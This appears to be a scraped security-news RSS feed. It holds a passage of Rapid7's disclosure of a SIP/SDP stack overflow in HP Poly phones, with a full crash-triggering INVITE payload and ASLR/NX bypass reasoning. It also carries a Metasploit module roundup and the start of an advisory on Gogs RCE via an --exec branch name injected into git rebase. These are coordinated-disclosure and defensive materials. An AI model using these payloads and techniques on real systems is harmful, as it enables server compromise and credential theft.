		return 0;

// ...snip...</pre><p>⠀</p><p><span>To demonstrate the vulnerability, we can construct an example SIP INVITE request that contains the required SDP data to trigger the buffer overflow. The malicious </span><span><span data-type="inlineCode">candidate</span></span><span> attribute will be comprised of:</span></p><ul><li><p><span>An attribute name of “</span><span><span data-type="inlineCode">a=candidate:</span></span><span>”, which is 12 bytes long.</span></p></li><li><p><span>244 </span><span><span data-type="inlineCode">A</span></span><span> characters, to fill out variable </span><span><span data-type="inlineCode">buffer256</span></span><span> (shown in the code snippet above), as 244 + 12 is 256.</span></p></li><li><p><span>19 </span><span><span data-type="inlineCode">B</span></span><span> characters, to provide padding between the variable </span><span><span data-type="inlineCode">buffer256</span></span><span> and the saved registers on the current stack frame.</span></p></li><li><p><span>The characters </span><span><span data-type="inlineCode">1111</span></span><span> (</span><span><span data-type="inlineCode">0x31313131</span></span><span> in hex) to overwrite the saved </span><span><span data-type="inlineCode">r4</span></span><span> register.</span></p></li><li><p><span>The characters </span><span><span data-type="inlineCode">2222</span></span><span> (</span><span><span data-type="inlineCode">0x32323232</span></span><span> in hex) to overwrite the saved </span><span><span data-type="inlineCode">r5</span></span><span> register.</span></p></li><li><p><span>The characters </span><span><span data-type="inlineCode">3333</span></span><span> (</span><span><span data-type="inlineCode">0x33333333</span></span><span> in hex) to overwrite the saved </span><span><span data-type="inlineCode">r11</span></span><span> register.</span></p></li><li><p><span>The characters </span><span><span data-type="inlineCode">4444</span></span><span> (</span><span><span data-type="inlineCode">0x34343434</span></span><span> in hex) to overwrite the saved </span><span><span data-type="inlineCode">pc</span></span><span> register.</span></p></li><li><p><span>A large number of </span><span><span data-type="inlineCode">C</span></span><span> characters (</span><span><span data-type="inlineCode">0x43</span></span><span> in hex) to show the remaining attacker controlled data on the stack.</span></p></li></ul><p><span>The entire example SIP INVITE request sent to the device is shown below:</span></p><p><span></span></p><pre language="html">INVITE sip:192.168.86.80:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.86.122:5060
Route: &lt;sip:192.168.86.122:5060;lr&gt;
From: &lt;sip:192.168.86.80:5060&gt;
To: &lt;sip:192.168.86.80:5060&gt;
Contact: &lt;sip:192.168.86.80&gt;
Call-ID: pmpcdwrwqojvfqin
CSeq: 5892 INVITE
Content-Type: application/sdp
Content-Length: 495

c=IN IP4 192.168.86.122
m=audio 50786 RTP/AVP 0
a=rtpmap:0 PCMU/8000/1
a=candidate:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBB1111222233334444CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC</pre><p>⠀</p><p><span>Upon receiving this SIP INVITE request, the helper function </span><span><span data-type="inlineCode">ParseICECandidate</span></span><span> will parse the malicious </span><span><span data-type="inlineCode">candidate</span></span><span> attribute, and a stack-based buffer overflow will occur. Observing the resulting crash in GDB, we can see that we have full control over the program counter (</span><span><span data-type="inlineCode">pc</span></span><span>) register, several general purpose registers, and the data located at the stack pointer (</span><span><span data-type="inlineCode">sp</span></span><span>).</span></p><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc07457e8927adbe3/6a15eca434dad5bf0018dac2/image2.png" alt="image2.png" caption="Figure 2: Inspecting a core dump showing the effects of the overflow." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="image2.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc07457e8927adbe3/6a15eca434dad5bf0018dac2/image2.png" data-sys-asset-uid="bltc07457e8927adbe3" data-sys-asset-filename="image2.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2: Inspecting a core dump showing the effects of the overflow." data-sys-asset-alt="image2.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 2: Inspecting a core dump showing the effects of the overflow.</figcaption></div></figure><h2>Exploitation</h2><p><span>Leveraging the overflow to execute arbitrary attacker controlled code is relatively straight forward. We can first note that </span><a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization" target="_blank"><span>Address Space Layout Randomization</span></a><span> (ASLR) is present on the target, as shown below by inspecting </span><a href="https://docs.kernel.org/admin-guide/sysctl/kernel.html#randomize-va-space" target="_blank"><span>/proc/sys/kernel/randomize_va_space</span></a><span> in a root shell.</span></p><p><span></span></p><pre language="html"># uname -a
Linux (none) 2.6.27.18 #1 PREEMPT Mon Jan 13 09:50:58 PST 2020 armv6l unknown

# cat /proc/sys/kernel/randomize_va_space
1</pre><p>⠀</p><p><span>Inspecting the </span><span><span data-type="inlineCode">polyapp</span></span><span> binary with the </span><a href="https://slimm609.github.io/checksec/" target="_blank"><span>checksec</span></a><span> tool we can see that </span><a href="https://en.wikipedia.org/wiki/NX_bit" target="_blank"><span>No Execute</span></a><span> (NX) is enabled, so the stack data will not be executable. As we will not be able to execute a payload directly on the stack, we can overcome this by using a </span><a href="https://en.wikipedia.org/wiki/Return-oriented_programming" target="_blank"><span>Return Oriented Programming</span></a><span> (ROP) chain to bypass the NX mitigation. Additionally, the binary has not been compiled as a </span><a href="https://en.wikipedia.org/wiki/Position-independent_code#Position-independent_executables" target="_blank"><span>Position Independent Executable</span></a><span> (PIE).</span></p><p><span></span></p><pre language="html">$ /usr/bin/checksec --file=rootfs/root/polyapp --format=json | jq
{
	"rootfs/root/polyapp": {
		"relro": "no",
		"canary": "no",
		"nx": "yes",
		"pie": "no",
		"rpath": "no",
		"runpath": "no",
		"symbols": "no",
		"fortify_source": "no",
		"fortified": "0",
		"fortify-able": "33"
	}
}</pre><p>⠀</p><p><span>As the </span><span><span data-type="inlineCode">polyapp</span></span><span> binary is always loaded at a low address (</span><span><span data-type="inlineCode">0x00008000</span></span><span>), using Virtual Address (VA) values from this range will require the attacker to be able to place multiple null (</span><span><span data-type="inlineCode">0x00</span></span><span>) bytes in the overflow buffer. This will not be possible due to how the SDP data is processed. </span></p><p><span>We must discover a suitable workaround to exploit the vulnerability while not writing any null bytes in the overflow buffer. We could try to discover an information leak vulnerability, that leaks an address of a Shared Object (SO) location within the processes address space. If the SO is loaded at a location such that its addresses will not contain null bytes, we can use these addresses for ROP gadgets. In lieu of a suitable information leak vulnerability, we will require an alternative technique.</span></p><p><span>Conveniently to our purpose, ASLR is not operating as expected on the device, and does not impact the load address of Shared Object (SO) libraries. For example, </span><span><span data-type="inlineCode">libc</span></span><span> will always be loaded at a Virtual Address (VA) of </span><span><span data-type="inlineCode">0x40a5c000</span></span><span> on firmware version </span><span><span data-type="inlineCode">6.4.7.4477</span></span><span>. This does not change between process restarts or device cold reboots. Shown below is the same load address for </span><span><span data-type="inlineCode">libc</span></span><span> in the </span><span><span data-type="inlineCode">polyapp</span></span><span> process, across a cold reboot of the device.</span></p><p><span></span></p><pre language="html"># date
Fri Dec 12 15:05:56 UTC 2025
# ps -A|grep polyapp
 1461 root569m S/usr/local/root/polyapp 
# cat /proc/1461/maps | grep libc
40a5c000-40b76000 r-xp 00000000 00:01 581/lib/libc-2.8.so
40b76000-40b7e000 ---p 0011a000 00:01 581/lib/libc-2.8.so
40b7e000-40b80000 r--p 0011a000 00:01 581/lib/libc-2.8.so
40b80000-40b81000 rw-p 0011c000 00:01 581/lib/libc-2.8.so

# date
Fri Dec 12 15:14:12 UTC 2025
# ps -A|grep polyapp
 1482 root      569m S    /usr/local/root/polyapp 
# cat /proc/1482/maps | grep libc
40a5c000-40b76000 r-xp 00000000 00:01 581        /lib/libc-2.8.so
40b76000-40b7e000 ---p 0011a000 00:01 581        /lib/libc-2.8.so
40b7e000-40b80000 r--p 0011a000 00:01 581        /lib/libc-2.8.so
40b80000-40b81000 rw-p 0011c000 00:01 581        /lib/libc-2.8.so</pre><p>⠀</p><p><span>Further inspection of the process maps file shows all shared libraries are loaded starting from a fixed address of </span><span><span data-type="inlineCode">0x40000000</span></span><span> and do not appear to honor ASLR. Knowing this, we can build a simple ROP chain using gadgets located at fixed VA’s within the </span><span><span data-type="inlineCode">libc</span></span><span> library. The gadgets we choose will not contain null bytes in their addresses.</span></p><p><span>We create a ROP chain that will execute an arbitrary OS command via the </span><a href="https://man7.org/linux/man-pages/man3/system.3.html" target="_blank"><span>system</span></a><span> standard C library function. The accompanying Metasploit exploit modules source code details the entire ROP chain.</span></p><h2>Remediation</h2><p><span>The following remediation guidance has been provided by the vendor.</span></p><p><span><em>“HP Poly recommends that administrators disable ICE connectivity in environments where it is not required. All affected Poly Voice devices should be updated to the latest available UCS release using the Poly Lens Device Management application.”</em></span></p><p><span>The following table indicates the appropriate fixed software releases.</span></p><table><colgroup data-width="664"><col><col></colgroup><tbody><tr><td><p><span><strong>Product Name</strong></span></p></td><td><p><span><strong>Updated version</strong></span></p></td></tr><tr><td><p><span>VVX</span></p></td><td><p><span>UCS 6.4.8</span></p></td></tr><tr><td><p><span>Trio 8300</span></p></td><td><p><span>UCS 8.1.7</span></p></td></tr><tr><td><p><span>Trio 8500</span></p></td><td><p><span>UCS 7.2.8</span></p></td></tr><tr><td><p><span>Trio 8800</span></p></td><td><p><span>UCS 7.2.8</span></p></td></tr></tbody></table><h2>Credit</h2><p><span>This vulnerability was discovered by Stephen Fewer, Senior Principal Security Researcher at Rapid7 and is being disclosed in accordance with Rapid7’s </span><a href="https://www.rapid7.com/security/disclosure" target="_self"><span>vulnerability disclosure policy</span></a><span>.</span></p><h2>Disclosure timeline</h2><ul><li><p><span><strong>January 6, 2026</strong></span><span>: Rapid7 makes initial outreach to HP who confirm contact the same day.</span></p></li><li><p><span><strong>January 7, 2026</strong></span><span>: Rapid7 discloses the technical writeup and exploit code to HP.</span></p></li><li><p><span><strong>January 9, 2026</strong></span><span>: HP confirms the finding, and provides Rapid7 with affected models, a reserved CVE identifier and an expected fix date for May, 2026.</span></p></li><li><p><span><strong>January 12, 2026</strong></span><span>: Rapid7 agrees to the fix date and asks for clarity on the end of support for the VVX series. HP replies the same day with requested information.</span></p></li><li><p><span><strong>April; 21, 2026:</strong></span><span> HP states a new release date by end of July and confirms CVSS, CWE and remediation guidance. Rapid7 gives June 1 as the disclosure date.</span></p></li><li><p><span><strong>May 5, 2026:</strong></span><span> HP provides affected models and confirms coordinate disclosure for June 1.</span></p></li><li><p><span><strong>May 18, 2026:</strong></span><span> HP provides remediation version numbers for patched firmware.</span></p></li><li><p><span><strong>June 1, 2026:</strong></span><span> This disclosure.</span></p></li></ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pentest Swarm AI Tool With Live Access to nmap, sqlmap, Burp, Metasploit, and Others]]></title>
<description><![CDATA[Pentest Swarm AI is the first open-source autonomous penetration testing platform built on a swarm intelligence architecture, not just multiple agents firing in a fixed sequence. Developed by Armur AI, it gives security professionals live, coordinated access to the full…
Read more →
The post Pent...]]></description>
<link>https://tsecurity.de/de/3559077/it-security-nachrichten/pentest-swarm-ai-tool-with-live-access-to-nmap-sqlmap-burp-metasploit-and-others/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559077/it-security-nachrichten/pentest-swarm-ai-tool-with-live-access-to-nmap-sqlmap-burp-metasploit-and-others/</guid>
<pubDate>Sat, 30 May 2026 15:04:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Pentest Swarm AI is the first open-source autonomous penetration testing platform built on a swarm intelligence architecture, not just multiple agents firing in a fixed sequence. Developed by Armur AI, it gives security professionals live, coordinated access to the full…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/pentest-swarm-ai-tool-with-live-access-to-nmap-sqlmap-burp-metasploit-and-others/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/pentest-swarm-ai-tool-with-live-access-to-nmap-sqlmap-burp-metasploit-and-others/">Pentest Swarm AI Tool With Live Access to nmap, sqlmap, Burp, Metasploit, and Others</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pentest Swarm AI Tool With Live Access to nmap, sqlmap, Burp, Metasploit, and Others]]></title>
<description><![CDATA[Pentest Swarm AI is the first open-source autonomous penetration testing platform built on a swarm intelligence architecture, not just multiple agents firing in a fixed sequence. Developed by Armur AI, it gives security professionals live, coordinated access to the full offensive stack, including...]]></description>
<link>https://tsecurity.de/de/3558983/it-security-nachrichten/pentest-swarm-ai-tool-with-live-access-to-nmap-sqlmap-burp-metasploit-and-others/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3558983/it-security-nachrichten/pentest-swarm-ai-tool-with-live-access-to-nmap-sqlmap-burp-metasploit-and-others/</guid>
<pubDate>Sat, 30 May 2026 14:07:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Pentest Swarm AI is the first open-source autonomous penetration testing platform built on a swarm intelligence architecture, not just multiple agents firing in a fixed sequence. Developed by Armur AI, it gives security professionals live, coordinated access to the full offensive stack, including nmap, SQLMap, Burp Suite, ZAP, and Metasploit, all driven by an AI […]</p>
<p>The post <a href="https://cybersecuritynews.com/pentest-swarm-ai-tool/">Pentest Swarm AI Tool With Live Access to nmap, sqlmap, Burp, Metasploit, and Others</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap Up 05/29/2026]]></title>
<description><![CDATA[More Linux LPEsHark the age of the Linux LPE has arrived. This week’s release follows up on recent work bringing new Linux LPEs to Metasploit users. Copy Fail seemed to have kicked off a trend of similar bugs and hot on its heels is Dirty Frag. Dirty Frag is actually two vulnerabilities in a tren...]]></description>
<link>https://tsecurity.de/de/3557546/it-security-nachrichten/metasploit-wrap-up-05292026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557546/it-security-nachrichten/metasploit-wrap-up-05292026/</guid>
<pubDate>Sat, 30 May 2026 01:09:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>More Linux LPEs</h2><p>Hark the age of the Linux LPE has arrived. This week’s release follows up on recent work bringing new Linux LPEs to Metasploit users. Copy Fail seemed to have kicked off a trend of similar bugs and hot on its heels is Dirty Frag. Dirty Frag is actually two vulnerabilities in a trenchcoat, individually identified as CVE-2026-43284 and CVE-2026-43500. Each is exploitable individually and comes with a new Metasploit module.</p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1420754738dc9925/6a19eb3e69c90088f77beb38/2026-05-29-meme.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="2026-05-29-meme.png" asset-alt="2026-05-29-meme.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1420754738dc9925/6a19eb3e69c90088f77beb38/2026-05-29-meme.png" data-sys-asset-uid="blt1420754738dc9925" data-sys-asset-filename="2026-05-29-meme.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="2026-05-29-meme.png" sys-style-type="display"></figure><p></p><h2>New module content (5)</h2><h3>Citrix ADC (NetScaler) CVE-2026-3055 Scanner</h3><p>Authors: sfewer-r7 and watchTowr</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21204">#21204</a> contributed by <a href="https://github.com/sfewer-r7">sfewer-r7</a></p><p>Path: scanner/http/citrix_netscaler_cve_2026_3055</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-3055&amp;referrer=blog">CVE-2026-3055</a></p><p>Description: Adds auxiliary module targeting CVE-2026-3055, an info leak in Citrix NetScaler (when configured as an SAML IdP). Similar to the other CitrixBleed vulns, we can leak memory and potentially discover session cookies.</p><h3>Ollama Scanner</h3><p>Author: h00die</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21271">#21271</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: scanner/http/ollama_info</p><p>Description: Adds an ollama LLM auxiliary scanner module to enumerate which LLMs are installed and details about them.</p><h3>xfrm-ESP Page-Cache Write via CVE-2026-43284</h3><p>Authors: Giovanni Heward and Hyunwoo Kim</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21434">#21434</a> contributed by <a href="https://github.com/offsecguy">offsecguy</a></p><p>Path: linux/local/cve_2026_43284_dirty_frag</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-43284&amp;referrer=blog">CVE-2026-43284</a></p><p>Description: Adds two new local privilege escalation modules for the "DirtyFrag" Linux kernel vulnerabilities. The first targets CVE-2026-43284, a page-cache write vulnerability in the xfrm/ESP fragmentation path. The second targets CVE-2026-43500, a page-cache corruption vulnerability in the RxRPC/rxkad subsystem.</p><h3>Dompdf RCE via Malicious Font Caching (CVE-2022-28368)</h3><p>Authors: Adithya Pawar, Fabian Bräunlein, Maximilian Kirchmeier, msutovsky-r7, and rvizx</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21155">#21155</a> contributed by <a href="https://github.com/Adithyadspawar">Adithyadspawar</a></p><p>Path: multi/http/dompdf_rce_cve_2022_28368</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2022-28368&amp;referrer=blog">CVE-2022-28368</a></p><p>Description: Adds a new exploit module for CVE-2022-28368, an unauthenticated remote code execution vulnerability in dompdf prior to 1.2.1. When remote resource loading is enabled, dompdf preserves the .php extension when caching fonts fetched via CSS @font-face rules, allowing an attacker to drop a PHP webshell in the font cache directory and trigger it with a follow-up request.</p><h3>Supsystic Contact Form Wordpress Plugin SSTI RCE</h3><p>Authors: Azril Fathoni and bootstrapbool <a href="mailto:bootstrapbool@gmail.com">bootstrapbool@gmail.com</a></p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21267">#21267</a> contributed by <a href="https://github.com/bootstrapbool">bootstrapbool</a></p><p>Path: multi/http/wp_plugin_supsystic_contact_form_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-4257&amp;referrer=blog">CVE-2026-4257</a></p><p>Description: This adds a module to exploit CVE-2026-4257 resulting in remote code execution on Wordpress sites with the Contact Form by Supsystic plugin. Contact Form plugin versions 1.7.36 and before are vulnerable.</p><h2>Bugs fixed (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21390">#21390</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - This refines our smb_to_ldap relay attack reporting by demoting anonymous authentication messages from print_good to print_status, reflecting that anonymous sessions do not grant additional privileges. It also skips the #on_relay_success callback for these sessions to prevent modules from needlessly acting on unprivileged access.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21443">#21443</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - This bumps the Metasploit-credentials gem to address an issue in how Kerberos hashes were being handled.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21485">#21485</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes MCP server test failure.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21487">#21487</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Updates to a newer version of RubyZip to support Zip files larger than 4GB.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-05-19T23%3A45%3A14Z..2026-05-26T12%3A02%3A08Z%22">Pull Requests 6.4.134...6.4.135</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.134...6.4.135">Full diff 6.4.134...6.4.135</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Gogs RCE Zero-Day Disclosed, Still Unpatched After 72 Days]]></title>
<description><![CDATA[A critical remote code execution flaw in Gogs has been publicly disclosed and remains unpatched. The issue is a CWE-88 argument injection bug in the pull request merge/rebase flow: a malicious branch name beginning with --exec can be passed into git rebase and interpreted as a Git option, causing...]]></description>
<link>https://tsecurity.de/de/3556525/it-security-nachrichten/critical-gogs-rce-zero-day-disclosed-still-unpatched-after-72-days/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556525/it-security-nachrichten/critical-gogs-rce-zero-day-disclosed-still-unpatched-after-72-days/</guid>
<pubDate>Fri, 29 May 2026 10:37:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/security/comments/1tqvftq/critical_gogs_rce_zeroday_disclosed_still/"> <img src="https://external-preview.redd.it/BlGnQQmBoO4m7_svVQbFyOMYN-wXV2NaNEitsH-qp5o.jpeg?width=640&amp;crop=smart&amp;auto=webp&amp;s=8a22d785dffb2403969b7b6ce9cfa93951a63f4a" alt="Critical Gogs RCE Zero-Day Disclosed, Still Unpatched After 72 Days" title="Critical Gogs RCE Zero-Day Disclosed, Still Unpatched After 72 Days"> </a> </td><td> <!-- SC_OFF --><div class="md"><p>A critical remote code execution flaw in Gogs has been publicly disclosed and remains unpatched. The issue is a CWE-88 argument injection bug in the pull request merge/rebase flow: a malicious branch name beginning with --exec can be passed into git rebase and interpreted as a Git option, causing attacker-controlled commands to run as the Gogs server user. Rapid7 reported it to maintainers on March 17, 2026, but no fix was available as of May 28. A Metasploit module is already public, so exposed Gogs instances should be treated as high risk. Temporary mitigations include disabling open registration, limiting repo creation, disabling “Rebase before merging,” and checking logs for suspicious --exec patterns.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/raptorhunter22"> /u/raptorhunter22 </a> <br> <span><a href="https://thecybersecguru.com/news/gogs-rce-vulnerability-0-day/">[link]</a></span>   <span><a href="https://www.reddit.com/r/security/comments/1tqvftq/critical_gogs_rce_zeroday_disclosed_still/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[Authenticated RCE via Argument Injection in Gogs (NOT FIXED)]]></title>
<description><![CDATA[OverviewRapid7 Labs discovered a critical argument injection (CWE-88) vulnerability in Gogs, a popular open-source self-hosted Git service. Rapid7 Labs scores this vulnerability as CVSSv4 9.4 (Critical). The vulnerability allows any authenticated user to achieve remote code execution (RCE) on the...]]></description>
<link>https://tsecurity.de/de/3554090/it-security-nachrichten/authenticated-rce-via-argument-injection-in-gogs-not-fixed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554090/it-security-nachrichten/authenticated-rce-via-argument-injection-in-gogs-not-fixed/</guid>
<pubDate>Thu, 28 May 2026 14:23:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Overview</h2><p><a href="https://www.rapid7.com/research" target="_self"><span>Rapid7 Labs</span></a><span> discovered a critical argument injection (</span><a href="https://cwe.mitre.org/data/definitions/88.html" target="_blank"><span>CWE-88</span></a><span>) vulnerability in </span><a href="https://gogs.io/" target="_blank"><span>Gogs</span></a><span>, a popular open-source self-hosted Git service. Rapid7 Labs scores this vulnerability as </span><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" target="_blank"><span>CVSSv4 9.4</span></a><span> (Critical). The vulnerability allows any authenticated user to achieve remote code execution (RCE) on the server by creating a pull request with a malicious branch name that injects the </span><span><span data-type="inlineCode">--exec</span></span><span> flag into </span><span><span data-type="inlineCode">git rebase</span></span><span> during the "Rebase before merging" merge operation. At the time of publication, the vendor has not released a patch.</span></p><p><span>The exploit requires no admin privileges and no interaction with other users; an attacker operates entirely within their own account. Since Gogs ships with open registration enabled by default (</span><span><span data-type="inlineCode">DISABLE_REGISTRATION = false</span></span><span>) and no limit on repository creation (</span><span><span data-type="inlineCode">MAX_CREATION_LIMIT = -1</span></span><span>), an unauthenticated attacker can simply create an account and repository on any default-configured instance. Any registered user who creates a repo is automatically its owner. From there, enabling rebase merging is a single toggle in settings, and the entire exploit chain can be operated without interaction from any other user.</span></p><p><span>Alternatively, any user with write access to a repository where rebase is already enabled can exploit it directly. On instances where repository creation is restricted, an attacker still only needs write access to any repository that has (or can have) rebase merging enabled.</span></p><p><span>The result is arbitrary command execution as the Gogs server process user, giving the attacker the ability to compromise the server, read every repository on the instance (including other users' private repos), dump credentials (password hashes, API tokens, SSH keys, 2FA secrets), pivot to other network-accessible systems, and modify any hosted repository's code.</span></p><p><span>The latest release versions at the time of research, Gogs </span><span><span data-type="inlineCode">0.14.2</span></span><span> and </span><span><span data-type="inlineCode">0.15.0+dev</span></span><span> (commit </span><span><span data-type="inlineCode">b53d3162</span></span><span>), were confirmed to be affected. All prior versions supporting the "Rebase before merging" style are likely vulnerable as well.</span></p><h2>Product description</h2><p><a href="https://gogs.io/" target="_blank"><span>Gogs</span></a><span> is a lightweight, self-hosted Git service written in Go. With </span><a href="https://github.com/gogs/gogs" target="_blank"><span>~50,000 GitHub stars and over 5,000 forks</span></a><span>, it's one of the more popular self-hosted alternatives to GitHub, commonly deployed by companies, universities, and open-source projects.</span></p><p><span>A </span><a href="https://www.shodan.io/search?query=http.title%3A%22Gogs%22+http.title%3A%22Sign+In%22" target="_blank"><span>Shodan</span></a><span> search for </span><span><span data-type="inlineCode">http.title:"Gogs" http.title:"Sign In"</span></span><span> returns 1,141 internet-facing instances at the time of publication. The real install base is much larger since most deployments sit behind VPNs or internal networks.</span></p><h2>Credit</h2><p><span>This vulnerability was discovered by Jonah Burgess (CryptoCat), Senior Security Researcher at Rapid7, and is being disclosed in accordance with Rapid7's </span><a href="https://www.rapid7.com/security/disclosure" target="_self"><span>vulnerability disclosure policy</span></a><span>.</span></p><h2>Impact</h2><p><span>Any Gogs instance with more than one user account is effectively "multi-tenant", meaning each user has their own repositories, credentials, and data on a shared server. This is the default for organizations, universities, and teams that use Gogs as a shared Git hosting platform. On any such instance, this vulnerability gives a single authenticated user full control of the underlying server. The attacker operates entirely within their own repository; no access to other users' repos is needed.</span></p><p><span>The vulnerability affects all supported platforms (Linux, macOS, Windows) and installation methods (pre-built binary, Docker, source). On Docker installations, the Gogs process runs as the </span><span>git</span><span> user (UID 1000 by default). On binary installations, the process user depends on how the administrator deployed the service (commonly </span><span><span data-type="inlineCode">git</span></span><span> or a dedicated service account).</span></p><p><span>The practical impact:</span></p><ul><li><p><span>Server compromise: Arbitrary command execution as the Gogs process user (typically </span><span><span data-type="inlineCode">git</span></span><span>)</span></p></li><li><p><span>Cross-tenant data breach: Read every repository on the instance, including other users' private repos</span></p></li><li><p><span>Credential theft: Dump the database containing password hashes, API tokens, SSH keys, and 2FA secrets for all users</span></p></li><li><p><span>Lateral movement: Pivot to other systems reachable from the server's network</span></p></li><li><p><span>Supply chain attacks: Modify any hosted repository's code. The Gogs process user (typically </span><span><span data-type="inlineCode">git</span></span><span>) has direct filesystem-level read/write access to every repository on the instance under a single </span><a href="https://github.com/gogs/gogs/blob/v0.14.2/conf/app.ini#L98" target="_blank"><span>REPOSITORY_ROOT</span></a><span> directory, with no OS-level isolation between repositories. Direct filesystem manipulation bypasses Gogs' audit logging, and without commit signing (uncommon on self-hosted instances), forged commits are difficult to detect.</span></p></li></ul><p><span>The exploit is fully automatable (a </span><a href="https://github.com/rapid7/metasploit-framework/pull/21515" target="_blank"><span>Metasploit module</span></a><span> is provided) and runs in seconds. When the attacker creates and deletes their own repository, the only trace is an HTTP 500 in the server logs. When exploiting an existing repository, additional artifacts remain (see heading </span><span><strong>Indicators of compromise</strong></span><span>).</span></p><h2>Technical analysis</h2><p><span>The testing target was a Gogs </span><span><span data-type="inlineCode">0.14.2</span></span><span> installation running via Docker on Linux (Ubuntu 24.04). The vulnerability was also confirmed on Gogs </span><span><span data-type="inlineCode">0.15.0+dev</span></span><span> (commit </span><span><span data-type="inlineCode">b53d3162</span></span><span>). As noted above, the vulnerability affects all supported platforms (Linux, macOS, Windows) and installation methods.</span></p><h3><span>Background: Merge vs. rebase in Gogs</span></h3><p><span>A 'standard merge' creates a merge commit joining two branch histories. A 'rebase before merge' replays the head branch's commits on top of the base branch to produce a linear history. Under the hood, Gogs runs </span><span><span data-type="inlineCode">git rebase &lt;base_branch&gt; &lt;head_branch&gt;</span></span><span> in a temp directory before pushing the result.</span></p><p><span>Critically, </span><span><span data-type="inlineCode">git rebase</span></span><span> accepts an </span><a href="https://git-scm.com/docs/git-rebase#Documentation/git-rebase.txt---execltcmdgt" target="_blank"><span>--exec flag</span></a><span> that tells Git to run a shell command (via 